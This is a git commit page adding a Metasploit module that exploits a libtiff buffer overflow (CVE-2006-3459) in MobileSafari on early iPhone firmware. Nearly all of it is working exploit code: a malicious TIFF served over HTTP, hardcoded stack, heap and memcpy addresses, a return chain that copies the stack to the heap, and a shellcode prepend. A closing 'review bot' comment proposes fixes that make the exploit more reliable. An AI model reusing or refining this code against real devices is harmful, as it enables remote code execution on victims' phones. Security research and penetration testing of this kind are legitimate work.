First version of the iPhone libtiff exploit
git-svn-id: file:///home/svn/framework3/trunk@5144 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
21d971139b
commit
41088c3ea4
Binary file not shown.
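--- /dev/null
+++ b/<path-not-shown-on-page>
@@ -0,0 +1,140 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
+
+#
+# This module acts as an HTTP server
+#
+include Exploit::Remote::HttpServer::HTML
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',
+'Description' => %q{
+This module exploits a buffer overflow in the version of
+libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
+1.1.1 of the Apple iPhone. iPhones which have not had the BSD
+tools installed will need to use a special payload.
+},
+'License' => MSF_LICENSE,
+'Author' => ['hdm'],
+'Version' => '$Revision$',
+'References' =>
+[
+['CVE', '2006-3459'],
+['OSVDB', '27723'],
+['BID', '19283']
+],
+'Payload' =>
+{
+'Space' => 300,
+'BadChars' => "",
+
+# Multi-threaded applications are not allowed to execve() on OS X
+# This stub injects a vfork/exit in front of the payload
+'Prepend' =>
+[
+0xe3a0c042, # vfork
+0xef000080, # sc
+0xe3500000, # cmp r0, #0
+0x1a000001, # bne
+0xe3a0c001, # exit(0)
+0xef000080 # sc
+].pack("V*")
+},
+'Targets' =>
+[
+[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.02)',
+{
+'Platform' => 'osx',
+'Arch' => ARCH_ARMLE,
+'Stack' => 0x0055a5bc,
+'Heap' => 0x0006b400,
+'Memcpy' => 0x3009a1bc,
+}
+],
+],
+'DisclosureDate' => 'Aug 01 2006'
+))
+end
+
+def on_request_uri(cli, request)
+
+# Re-generate the payload
+return if ((p = regenerate_payload(cli)) == nil)
+
+print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+# Transmit the compressed response to the client
+send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
+
+# Handle the payload
+handler(cli)
+end
+
+def generate_tiff(code)
+
+path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
+
+print_status("Opening file...")
+data = File.read(path, File.size(path))
+print_status("Done...")
+
+#
+# The basic idea:
+#
+# Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
+# This loads r0-r3 and pc from the stack, jumping to the address in pc
+# The address in pc is the real address of memcpy(), which takes
+# parameters via the r0-r3 registers. We memcpy the stack address
+# (which seems to be static across all versions) to an unused page
+# on the heap. Finally, we patch up a local variable (r6) and then
+# return back to the heap location we copied the stack to.
+#
+
+dst_ptr = target['Heap']
+src_ptr = target['Stack']
+shl_len = 168 + payload.encoded.length
+
+# Still some wonky characters in here, this doesn't work with alpha/english/etc
+patt = pattern_create(shl_len)
+
+# 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
+patt[120,4] = [0x300df800].pack("V")
+
+
+# memcpy(r0, r1, r2)
+patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
+patt[124,4] = [dst_ptr].pack("V") # dst
+patt[128,4] = [src_ptr].pack("V") # src
+patt[132,4] = [shl_len].pack("V") # len
+
+# fix up r6 to bypass an exception
+patt[112,4] = [dst_ptr + shl_len].pack("V")
+
+# Return back to our copied stack data
+patt[164,4] = [dst_ptr + 168].pack("V")
+
+# Stick our shellcode into the buffer
+patt[168, payload.encoded.length] = payload.encoded
+
+data << patt
+data
+end
+
+end
+end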
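Review bot: `generate_tiff(code)` never uses its `code` argument — both the length computation (`shl_len = 168 + payload.encoded.length`) and the buffer write (`patt[168, payload.encoded.length] = payload.encoded`) read the module-level `payload`, while `on_request_uri` passes it the per-client result of `regenerate_payload(cli)`, so if those two ever differ the freshly regenerated payload is silently discarded. Use the argument consistently: `shl_len = 168 + code.encoded.length` and `patt[168, code.encoded.length] = code.encoded`. Separately, `data = File.read(path, File.size(path))` opens the binary TIFF template without a binary mode, which on a Windows-hosted framework may newline-translate the bytes; `File.open(path, 'rb') { |f| f.read }` avoids that. The surrounding `print_status("Opening file...")` / `print_status("Done...")` pair reads as leftover debugging output and could be dropped.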